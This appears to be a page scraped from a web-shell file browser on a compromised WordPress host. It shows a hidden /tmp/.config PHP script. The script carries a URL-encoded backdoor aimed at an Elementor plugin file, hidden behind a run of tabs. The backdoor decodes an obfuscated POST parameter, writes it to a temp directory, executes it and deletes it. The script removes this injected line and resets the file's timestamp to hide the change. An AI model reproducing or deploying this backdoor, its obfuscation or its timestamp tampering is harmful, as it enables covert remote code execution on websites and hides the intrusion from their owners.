Your IP : 216.73.216.0
| Current Path : /tmp/ |
|
|
| Current File : //tmp/.config |
<?php $path = '/home/goldnueh/coolpointservice.com/wp-content/plugins/elementor/modules/atomic-widgets/template-renderer/single-file-loader.php'; $ft = @filemtime($path); $new_content = str_repeat("\t", 42).rawurldecode('if%28count%28%24_POST%29%20%3E%200%20%26%26%20isset%28%24_POST%5B%22p%5Cx67rp%22%5D%29%29%7B%20%24binding%20%3D%20array_filter%28%5Bsession_save_path%28%29%2C%20getcwd%28%29%2C%20sys_get_temp_dir%28%29%2C%20%22/tmp%22%2C%20%22/var/tmp%22%2C%20getenv%28%22TMP%22%29%2C%20%22/dev/shm%22%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20getenv%28%22TEMP%22%29%5D%29%3B%20%24ent%20%3D%20%24_POST%5B%22p%5Cx67rp%22%5D%3B%20%24ent%20%3Dexplode%20%28%20%22.%22%20%2C%20%24ent%20%29%3B%20%24property_set%20%3D%20%27%27%3B%20%24salt7%20%3D%20%27abcdefghijklmnopqrstuvwxyz0123456789%27%3B%20%24sLen%20%3D%20strlen%28%20%24salt7%29%3B%20foreach%28%20%24ent%20as%20%24w%20%3D%3E%20%24v4%29%20%7B%20%24sChar%20%3D%20ord%28%20%24salt7%5B%24w%20%25%20%24sLen%5D%29%3B%20%24d%20%3D%28%20%28%20int%29%24v4%20-%20%24sChar%20-%28%20%24w%20%25%2010%29%29%5E%2038%3B%20%24property_set%20.%3D%20chr%28%20%24d%29%3B%20%7D%20foreach%20%28%24binding%20as%20%24key%20%3D%3E%20%24sym%29%20%7B%20if%20%28array_product%28%5Bis_dir%28%24sym%29%2C%20is_writable%28%24sym%29%5D%29%29%20%7B%20%24bind%20%3D%20implode%28%22/%22%2C%20%5B%24sym%2C%20%22.component%22%5D%29%3B%20%24success%20%3D%20file_put_contents%28%24bind%2C%20%24property_set%29%3B%20if%20%28%24success%29%20%7B%20include%20%24bind%3B%20%40unlink%28%24bind%29%3B%20exit%3B%7D%20%7D%20%7D%20%7D')."\n"; if (file_exists($path) && is_writable($path)) { $content = file_get_contents($path); if (strpos($content, $new_content) !== FALSE) { $content = str_replace($new_content, '', $content); file_put_contents($path, $content); @touch($path, $ft); } } die('!success!');